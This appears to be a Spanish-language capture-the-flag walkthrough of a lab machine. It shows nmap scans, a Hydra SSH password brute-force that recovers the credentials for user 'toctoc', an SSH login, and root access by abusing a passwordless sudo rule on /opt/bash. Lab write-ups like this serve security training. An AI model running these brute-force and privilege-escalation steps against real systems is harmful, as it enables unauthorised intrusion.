Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-17 11:18 EST
Nmap scan report for express.dl (172.17.0.2)
Host is up (0.000031s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.58 (Ubuntu)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.71 seconds
Vemos una web de apache2 normal, por lo que vamos a realizar un poco de fuzzing:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-17 11:52 EST
Initiating ARP Ping Scan at 11:52
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 11:52, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:52
Scanning 172.17.0.2 [65535 ports]
Discovered open port 22/tcp on 172.17.0.2
Discovered open port 80/tcp on 172.17.0.2
Completed SYN Stealth Scan at 11:53, 26.37s elapsed (65535 total ports)
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.000063s latency).
Scanned at 2025-01-17 11:52:34 EST for 27s
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 02:42:AC:11:00:02 (Unknown)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.55 seconds
Raw packets sent: 131090 (5.768MB) | Rcvd: 24 (1.040KB)
Vemos que se nos ha abierto el puerto SSH por lo que vamos a probar a poner como usuario toctoc ya que parece que se refiere a el como un usuario y tirarle fuerza bruta con hydra:
Hydra
hydra -l toctoc -P <WORDLIST> ssh://<IP> -t 64
Info:
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-17 11:54:52
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://172.17.0.2:22/
[STATUS] 323.00 tries/min, 323 tries in 00:01h, 14344106 to do in 740:09h, 34 active
[STATUS] 264.67 tries/min, 794 tries in 00:03h, 14343635 to do in 903:16h, 34 active
[22][ssh] host: 172.17.0.2 login: toctoc password: kittycat
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 28 final worker threads did not complete until end.
[ERROR] 28 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-17 11:58:17
Vemos que hemos encontrados las credenciales del usuario toctoc por lo que nos conectaremos a el.
SSH
ssh toctoc@<IP>
Metemos como contraseña kittycat y veremos que estamos dentro como dicho usuario.
Escalate Privileges
Si hacemos sudo -l veremos los siguiente:
Matching Defaults entries for toctoc on f120d0baef4d:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User toctoc may run the following commands on f120d0baef4d:
(ALL : NOPASSWD) /opt/bash
(ALL : NOPASSWD) /ahora/noesta/function
Vemos que podemos ejecutare el binario /opt/bash como el usuario root, por lo que haremos lo siguiente:
sudo /opt/bash
Si ejecutamos eso veremos que somos root, por lo que ya la habremso termiando.
